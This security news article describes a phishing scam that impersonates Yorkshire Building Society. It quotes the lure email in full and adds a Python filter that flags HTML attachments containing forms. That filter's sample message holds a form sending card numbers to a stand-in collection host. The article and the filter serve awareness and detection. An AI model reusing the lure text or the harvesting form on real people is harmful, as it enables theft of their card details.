Cybercriminals rely on a true story to make their scheme more legitimate-looking

Oct 5, 2012 19:01 GMT

The folks from Hoax Slayer have stumbled upon an interesting phishing scam that’s designed to steal the credit card details and contact information of unsuspecting Yorkshire Building Society customers.

Entitled “Our commitment to online security,” the malicious notifications look something like this:

Dear Customer,

Egg Savings and Mortgage accounts have now been transferred to Yorkshire Building Society's systems. As a Yorkshire Building Society customer you'll continue to enjoy all the services you used with Egg.

We believe it's important to keep up to date with the latest online security measures, We recently upgraded our database system for new security measures. We have tried to contact you but have been unable to do so.

Please proceed via attached file to automatically upgrade your details. If you do not confirm your details until 05 October 2012 your online account will be interrupted for security reasons.

Yours sincerely, Security Department, Yorkshire Building Society.

Of course, the message has nothing to do with Yorkshire Building Society. While it’s true that the organization did acquire Egg’s mortgage and savings accounts, the rest of the alert has been made up by the crooks.

Users who fall for it and open the attachment are presented with a form that asks them to hand over their details. Once the form is submitted, all the valuable credit card information is stored in a database controlled by the crooks.

In this case, if the victim decides to check out the account transfer story, they will find that it’s true. This increases the phishing scheme’s chances of success.

Once again, we would like to remind everyone that banks will never attach forms to the emails they send out to customers. Also, the links contained in legitimate emails will always point to the institution’s official website.
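
One way to turn the "banks never attach forms" rule into a mail-filter check, as an added example that is not part of the original article: it parses a message, finds HTML attachments that contain a form, and reports which host each form would submit to. The sample message, the host `collector.example` and the names `FormFinder` and `attached_forms` are constructed for illustration.

```python
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormFinder(HTMLParser):
    """Collect each <form>'s action URL and the names of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.forms.append({"action": attrs.get("action") or "", "fields": []})
        elif tag == "input" and self.forms and attrs.get("name"):
            self.forms[-1]["fields"].append(attrs["name"])


def attached_forms(raw_message):
    """Return one finding per <form> found in an HTML attachment."""
    msg = message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        finder = FormFinder()
        finder.feed(part.get_content())
        for form in finder.forms:
            findings.append({"attachment": part.get_filename(), "fields": form["fields"],
                             "posts_to": urlparse(form["action"]).hostname})
    return findings


# Constructed sample message for illustration, not the real phishing email.
SAMPLE = """\
Subject: Our commitment to online security
Content-Type: multipart/mixed; boundary="BOUND"

--BOUND
Content-Type: text/plain; charset="utf-8"

Please proceed via attached file to upgrade your details.
--BOUND
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="upgrade.html"

<form action="http://collector.example/save" method="post">
<input name="card_number"><input name="expiry"><input type="submit"></form>
--BOUND--
"""
```

A production filter would also inspect attachments by file extension, since an HTML form can arrive under a generic content type.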